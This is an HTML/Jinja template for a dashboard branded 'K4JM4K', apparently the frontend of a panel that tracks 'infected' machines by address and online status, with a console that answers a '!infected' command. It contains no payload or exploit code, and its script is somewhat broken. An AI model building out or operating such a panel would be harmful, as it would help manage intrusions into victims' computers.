<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel = "stylesheet" href = "{{url_for('static', filename = 'style.css')}}">
    <script src="https://kit.fontawesome.com/4ef9093d57.js" crossorigin="anonymous"></script>
    <title>K4JM4K - OFFICIAL</title>
</head>
<body>
    <div class = "mainBox">
        <div class="burgerMenu">
            <div class = "burgerMenuNav">
                <img src = "https://freesvg.org/img/IncessantBlabber-Radioactive-symbol.png">
                <h1>K4JM4K - OFFICIAL</h1>
            </div>
            <div class = "burgerMenuWlcm">
                <div class = "burgerMenuPfp">
                    <img src = "https://img.freepik.com/premium-vector/mutant-ape-yacht-club-nft-artwork-collection-set-unique-bored-monkey-character-nfts-variant_361671-259.jpg">
                </div>
                <div class = "burgerMenuTitle">
                    <h1>Welcome back <br><b>string</b>!</h1>
                </div>
            </div>
            <ul class="burgerMenuList">
                <li class="burgerMenuItems" id = "active">
                    <b><i class = "fa fa-home"></i> Home</b>
                </li>
                <li class="burgerMenuItems">
                    <b><i class="fa-brands fa-tiktok"> </i> TikTok</b>
                </li>
                <li class="burgerMenuItems">
                    <b><i class="fa-brands fa-discord"> </i> Discord</b>
                </li>
                <li class="burgerMenuItems">
                    <b><i class="fa-solid fa-lock"> </i> Login</b>
                </li>
                <li class="burgerMenuItems">
                    <b><i class="fa-solid fa-address-card"> </i> Register</b>
                </li>
                <li class="burgerMenuItems">
                    <b><i class="fa-solid fa-gear"> </i> Settings</b>
                </li>
            </ul>
        </div>
        <ul class = "itemList">
            <div class = "statsBox">
                <div class="statsBoxChild">
                    <div class="iconBox"><i id = "online" class="fa-solid fa-user-plus"></i></div>
                    <div class="analyticsBox">
                        <p>{{online}}</p>
                    </div>
                </div>
                <div class="statsBoxChild">
                    <div class="iconBox"><i id = "offline" class="fa-solid fa-user-xmark"></i></div>
                    <div class="analyticsBox">
                        <p>{{offline}}</p>
                    </div>
                </div>
            </div>
            {% for item in items %}
                <li class = "parentBox">
                    <div class = "childBox">
                        <i class = "fa fa-user"></i>
                    </div>
                    <div id = "address" class = "childBox">
                        {{item.address}}
                    </div>
                    <div class = "childBox">
                        <div id = "status">
                            {{item.status}}
                        </div>
                        <div id = "date">
                            {{item.date}}
                        </div>
                    </div>
                </li>
            {% endfor%}
        </ul>
        <div class="consoleArea">
            <div class="consoleBox">
                <pre class="consoleOutput" style = "color: rgb(255, 255, 23); font-size: 1rem;">


    ░█─▄▀ ─█▀█─ ───░█ ░█▀▄▀█ ─█▀█─ ░█─▄▀ 
    ░█▀▄─ █▄▄█▄ ─▄─░█ ░█░█░█ █▄▄█▄ ░█▀▄─ 
    ░█─░█ ───█─ ░█▄▄█ ░█──░█ ───█─ ░█─░█ 


    <b style = "color: white;" id = "kajmak"></b>
                </pre>
                <input id = "inputValue" placeholder = "Type command..." type = "text">
            </div>
        </div>
    </div>
    <script>
        const statuses = document.querySelectorAll('#status');
        
        statuses.forEach(status => {
            if(status.textContent.trim() === 'Online') {
                status.style.color = 'rgb(30, 255, 0)';
            } else if (status.textContent.trim() === 'Offline') {
                status.style.color = 'rgb(255, 0, 0)';
            }
        });

        infectedUsers = () => {
            let inputValue = document.getElementById('inputValue').value;
            const infectedUser = document.querySelectorAll('#address');

            if(inputValue == '!infected') {
                infectedUser.forEach(address => {
                    document.getElementById('kajmak').innerText = '{{address}}';
                })
            }
        }
    </script>
</body>
</html>
